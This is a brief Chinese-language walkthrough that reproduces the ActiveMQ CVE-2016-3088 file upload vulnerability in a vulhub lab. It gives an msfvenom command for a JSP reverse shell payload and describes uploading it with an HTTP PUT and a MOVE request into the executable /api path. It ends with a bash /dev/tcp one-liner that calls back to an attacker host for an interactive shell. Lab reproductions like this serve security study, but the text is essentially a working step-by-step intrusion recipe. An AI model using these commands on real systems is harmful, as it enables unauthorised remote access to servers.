0x01 前言

简单对ActiveMQ-cve-2016-3088任意文件上传漏洞进行一个复现。

懂得都懂。

第一步:环境准备

1.1 在vulhub上开启ActiveMQ_CVE-2016-3088环境。这里不多做赘述。

第二步:漏洞利用

1.1 在攻击机器kali上制作jsp反弹shell。

输入如下:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.xx.xx(这里填写攻击机器ip) LPORT=8888 -f raw > shell.jsp

1.2 之后利用burpsuite抓取8161端口的包,修改包http的方法为put并且将上述shell.jsp里面的内容粘贴到里面,如下图:

oucGIe.jpg

1.3 使用move方法移动到可执行目录之前,先确定可上传的执行文件路径。

ougIXt.jpg

确定可上传路径为/opt/activemq/webapps/api/。

1.4 移动文件

ou2C7T.jpg

1.5 在攻击机器开启监听8888端口,访问http://yourip:8186/api,可以看到上传的s.jsp文件。

ou2YjI.jpg

1.6 点击s.jsp,攻击机收到了反弹shell。

ou2s3j.jpg

1.7 输入bash -i >& /dev/tcp/192.168.xx.xx/443 0>&1再次反弹回交互式shell。

ou2o8J.jpg

0x02 结语

任重而道远。